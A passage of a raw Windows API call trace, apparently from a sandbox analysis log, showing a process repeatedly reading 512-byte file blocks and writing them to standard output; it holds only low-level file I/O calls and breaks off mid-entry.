WriteFile (in: hFile=0x50, lpBuffer=0x26ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee1c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.684] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.684] GetFileType (hFile=0x50) returned 0x1 [0227.684] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.684] WriteFile (in: hFile=0x50, lpBuffer=0x26ee6c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee6c*, lpNumberOfBytesWritten=0x26de70*=0x20, lpOverlapped=0x0) returned 1 [0227.684] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.684] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de5c | out: lpNewFilePointer=0x0) returned 1 [0227.684] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.685] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.685] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.685] GetFileType (hFile=0x50) returned 0x1 [0227.685] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.685] GetFileType (hFile=0x50) returned 0x1 [0227.685] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.685] WriteFile (in: hFile=0x50, lpBuffer=0x26ec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.685] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.685] GetFileType (hFile=0x50) returned 0x1 [0227.685] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.685] WriteFile (in: hFile=0x50, lpBuffer=0x26ecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ecdc*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.685] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.685] GetFileType (hFile=0x50) returned 0x1 [0227.685] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.685] WriteFile (in: hFile=0x50, lpBuffer=0x26ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed2c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.685] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.685] GetFileType (hFile=0x50) returned 0x1 [0227.685] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.685] WriteFile (in: hFile=0x50, lpBuffer=0x26ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed7c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.685] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.685] GetFileType (hFile=0x50) returned 0x1 [0227.685] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.685] WriteFile (in: hFile=0x50, lpBuffer=0x26edcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26edcc*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.686] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.686] GetFileType (hFile=0x50) returned 0x1 [0227.686] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.686] WriteFile (in: hFile=0x50, lpBuffer=0x26ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee1c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.686] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.686] GetFileType (hFile=0x50) returned 0x1 [0227.686] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.686] WriteFile (in: hFile=0x50, lpBuffer=0x26ee6c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee6c*, lpNumberOfBytesWritten=0x26de70*=0x20, lpOverlapped=0x0) returned 1 [0227.686] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.686] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de5c | out: lpNewFilePointer=0x0) returned 1 [0227.686] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.686] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.686] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.686] GetFileType (hFile=0x50) returned 0x1 [0227.686] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.686] GetFileType (hFile=0x50) returned 0x1 [0227.686] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.686] WriteFile (in: hFile=0x50, lpBuffer=0x26ec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.686] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.686] GetFileType (hFile=0x50) returned 0x1 [0227.686] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.686] WriteFile (in: hFile=0x50, lpBuffer=0x26ecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ecdc*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.687] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.687] GetFileType (hFile=0x50) returned 0x1 [0227.687] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.687] WriteFile (in: hFile=0x50, lpBuffer=0x26ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed2c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.687] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.687] GetFileType (hFile=0x50) returned 0x1 [0227.687] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.687] WriteFile (in: hFile=0x50, lpBuffer=0x26ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed7c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.687] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.687] GetFileType (hFile=0x50) returned 0x1 [0227.687] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.687] WriteFile (in: hFile=0x50, lpBuffer=0x26edcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26edcc*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.687] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.687] GetFileType (hFile=0x50) returned 0x1 [0227.687] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.687] WriteFile (in: hFile=0x50, lpBuffer=0x26ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee1c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.687] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.687] GetFileType (hFile=0x50) returned 0x1 [0227.687] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.687] WriteFile (in: hFile=0x50, lpBuffer=0x26ee6c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee6c*, lpNumberOfBytesWritten=0x26de70*=0x20, lpOverlapped=0x0) returned 1 [0227.687] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.688] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de5c | out: lpNewFilePointer=0x0) returned 1 [0227.688] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.688] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.688] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.688] GetFileType (hFile=0x50) returned 0x1 [0227.688] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.688] GetFileType (hFile=0x50) returned 0x1 [0227.688] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.688] WriteFile (in: hFile=0x50, lpBuffer=0x26ec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.688] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.688] GetFileType (hFile=0x50) returned 0x1 [0227.688] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.688] WriteFile (in: hFile=0x50, lpBuffer=0x26ecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ecdc*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.688] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.688] GetFileType (hFile=0x50) returned 0x1 [0227.688] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.688] WriteFile (in: hFile=0x50, lpBuffer=0x26ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed2c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.688] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.688] GetFileType (hFile=0x50) returned 0x1 [0227.688] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.688] WriteFile (in: hFile=0x50, lpBuffer=0x26ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed7c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.688] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.688] GetFileType (hFile=0x50) returned 0x1 [0227.689] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.689] WriteFile (in: hFile=0x50, lpBuffer=0x26edcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26edcc*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.689] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.689] GetFileType (hFile=0x50) returned 0x1 [0227.689] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.689] WriteFile (in: hFile=0x50, lpBuffer=0x26ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee1c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.689] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.689] GetFileType (hFile=0x50) returned 0x1 [0227.689] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.689] WriteFile (in: hFile=0x50, lpBuffer=0x26ee6c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee6c*, lpNumberOfBytesWritten=0x26de70*=0x20, lpOverlapped=0x0) returned 1 [0227.689] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.689] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de5c | out: lpNewFilePointer=0x0) returned 1 [0227.689] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.689] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.689] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.689] GetFileType (hFile=0x50) returned 0x1 [0227.689] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.689] GetFileType (hFile=0x50) returned 0x1 [0227.689] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.689] WriteFile (in: hFile=0x50, lpBuffer=0x26ec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.689] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.690] GetFileType (hFile=0x50) returned 0x1 [0227.690] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.690] WriteFile (in: hFile=0x50, lpBuffer=0x26ecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ecdc*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.690] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.690] GetFileType (hFile=0x50) returned 0x1 [0227.690] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.690] WriteFile (in: hFile=0x50, lpBuffer=0x26ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed2c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.690] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.690] GetFileType (hFile=0x50) returned 0x1 [0227.690] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.690] WriteFile (in: hFile=0x50, lpBuffer=0x26ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed7c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.690] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.690] GetFileType (hFile=0x50) returned 0x1 [0227.690] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.690] WriteFile (in: hFile=0x50, lpBuffer=0x26edcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26edcc*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.690] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.690] GetFileType (hFile=0x50) returned 0x1 [0227.690] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.690] WriteFile (in: hFile=0x50, lpBuffer=0x26ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee1c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.691] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.691] GetFileType (hFile=0x50) returned 0x1 [0227.691] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.691] WriteFile (in: hFile=0x50, lpBuffer=0x26ee6c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee6c*, lpNumberOfBytesWritten=0x26de70*=0x20, lpOverlapped=0x0) returned 1 [0227.691] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.691] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de5c | out: lpNewFilePointer=0x0) returned 1 [0227.691] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.691] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.691] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.691] GetFileType (hFile=0x50) returned 0x1 [0227.691] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.691] GetFileType (hFile=0x50) returned 0x1 [0227.691] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.691] WriteFile (in: hFile=0x50, lpBuffer=0x26ec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.694] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.694] GetFileType (hFile=0x50) returned 0x1 [0227.694] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.694] WriteFile (in: hFile=0x50, lpBuffer=0x26ecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ecdc*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.694] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.694] GetFileType (hFile=0x50) returned 0x1 [0227.694] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.695] WriteFile (in: hFile=0x50, lpBuffer=0x26ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed2c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.695] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.695] GetFileType (hFile=0x50) returned 0x1 [0227.695] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.695] WriteFile (in: hFile=0x50, lpBuffer=0x26ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed7c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.695] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.695] GetFileType (hFile=0x50) returned 0x1 [0227.695] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.695] WriteFile (in: hFile=0x50, lpBuffer=0x26edcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26edcc*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.695] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.695] GetFileType (hFile=0x50) returned 0x1 [0227.695] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.695] WriteFile (in: hFile=0x50, lpBuffer=0x26ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee1c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.695] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.695] GetFileType (hFile=0x50) returned 0x1 [0227.695] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.695] WriteFile (in: hFile=0x50, lpBuffer=0x26ee6c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee6c*, lpNumberOfBytesWritten=0x26de70*=0x20, lpOverlapped=0x0) returned 1 [0227.695] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.695] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de5c | out: lpNewFilePointer=0x0) returned 1 [0227.695] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.695] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.696] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.696] GetFileType (hFile=0x50) returned 0x1 [0227.696] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.696] GetFileType (hFile=0x50) returned 0x1 [0227.696] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.696] WriteFile (in: hFile=0x50, lpBuffer=0x26ec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.696] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.696] GetFileType (hFile=0x50) returned 0x1 [0227.696] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.696] WriteFile (in: hFile=0x50, lpBuffer=0x26ecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ecdc*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.696] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.696] GetFileType (hFile=0x50) returned 0x1 [0227.696] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.696] WriteFile (in: hFile=0x50, lpBuffer=0x26ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed2c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.696] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.696] GetFileType (hFile=0x50) returned 0x1 [0227.696] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.696] WriteFile (in: hFile=0x50, lpBuffer=0x26ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed7c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.697] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.697] GetFileType (hFile=0x50) returned 0x1 [0227.697] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.697] WriteFile (in: hFile=0x50, lpBuffer=0x26edcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26edcc*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.697] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.697] GetFileType (hFile=0x50) returned 0x1 [0227.697] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.697] WriteFile (in: hFile=0x50, lpBuffer=0x26ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee1c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.697] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.697] GetFileType (hFile=0x50) returned 0x1 [0227.697] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.697] WriteFile (in: hFile=0x50, lpBuffer=0x26ee6c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee6c*, lpNumberOfBytesWritten=0x26de70*=0x20, lpOverlapped=0x0) returned 1 [0227.697] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.697] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de5c | out: lpNewFilePointer=0x0) returned 1 [0227.697] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.697] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.697] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.697] GetFileType (hFile=0x50) returned 0x1 [0227.697] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.697] GetFileType (hFile=0x50) returned 0x1 [0227.697] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.697] WriteFile (in: hFile=0x50, lpBuffer=0x26ec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.697] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.698] GetFileType (hFile=0x50) returned 0x1 [0227.698] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.698] WriteFile (in: hFile=0x50, lpBuffer=0x26ecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ecdc*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.698] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.698] GetFileType (hFile=0x50) returned 0x1 [0227.698] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.698] WriteFile (in: hFile=0x50, lpBuffer=0x26ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed2c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.698] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.698] GetFileType (hFile=0x50) returned 0x1 [0227.698] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.698] WriteFile (in: hFile=0x50, lpBuffer=0x26ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed7c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.698] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.698] GetFileType (hFile=0x50) returned 0x1 [0227.698] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.698] WriteFile (in: hFile=0x50, lpBuffer=0x26edcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26edcc*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.698] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.698] GetFileType (hFile=0x50) returned 0x1 [0227.698] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.698] WriteFile (in: hFile=0x50, lpBuffer=0x26ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee1c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.698] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.698] GetFileType (hFile=0x50) returned 0x1 [0227.698] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.698] WriteFile (in: hFile=0x50, lpBuffer=0x26ee6c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee6c*, lpNumberOfBytesWritten=0x26de70*=0x20, lpOverlapped=0x0) returned 1 [0227.699] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.699] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de5c | out: lpNewFilePointer=0x0) returned 1 [0227.699] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.699] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.699] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.699] GetFileType (hFile=0x50) returned 0x1 [0227.699] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.699] GetFileType (hFile=0x50) returned 0x1 [0227.699] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.699] WriteFile (in: hFile=0x50, 